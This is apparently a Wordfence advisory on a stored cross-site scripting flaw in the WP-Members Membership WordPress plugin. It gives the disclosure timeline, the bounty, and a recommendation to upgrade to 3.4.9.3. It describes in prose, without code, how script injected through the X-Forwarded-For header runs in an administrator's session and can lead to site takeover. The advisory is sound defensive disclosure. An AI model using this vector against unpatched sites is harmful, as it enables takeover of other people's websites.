Unauthenticated Stored Cross-Site Scripting Vulnerability Patched in WP-Members Membership Plugin – $500 Bounty Awarded
🎉 Did you know we’re running a Bug Bounty Extravaganza again?
Earn over 6x our usual bounty rates, up to $10,000, for all vulnerabilities submitted through May 27th, 2024 when you opt to have Wordfence handle responsible disclosure!
On February 21st, 2024, during our second Bug Bounty Extravaganza, an Unauthenticated Stored Cross-Site Scripting vulnerability was reported to us in the WP-Members Membership Plugin, which is installed on over 60,000 sites. The vulnerability allows threat actors to inject arbitrary JavaScript via the X-Forwarded-For header, used by the plugin for logging purposes. When viewed by an administrator, the malicious code is executed in the context of the administrator’s browser session and allows for the creation of malicious administrator users as well as changes to an affected site’s settings which could lead to a complete site takeover.
Kudos to Webbernaut who responsibly disclosed this vulnerability to us through our Bug Bounty Program. Their find was rewarded with a $500 bounty. Our mission is to Secure the Web, which is why we are investing in quality vulnerability research and collaborating with researchers of this caliber through our Bug Bounty Program. We are committed to making the WordPress ecosystem more secure, which ultimately makes the entire web more secure.
All Wordfence Premium, Wordfence Care, and Wordfence Response customers, as well as those using the free version of our plugin, are protected against any exploits targeting this vulnerability by the Wordfence firewall’s built-in Cross-Site Scripting protection.
Our initial outreach to RocketGeek took place on February 23rd, 2024. We received a reply and disclosed details on the same day. Version 3.4.9.2, released on March 7th, 2024, protected against further exploitation of this vulnerability, but did not prevent existing injected payloads from firing. A fully patched version addressing this issue was made available shortly thereafter on March 7th.
We recommend that site owners upgrade their WP-Members Membership plugin to the latest patched version, which is 3.4.9.3.
Vulnerability Summary from Wordfence Intelligence
Description: WP-Members Membership Plugin
Source: wordfence.com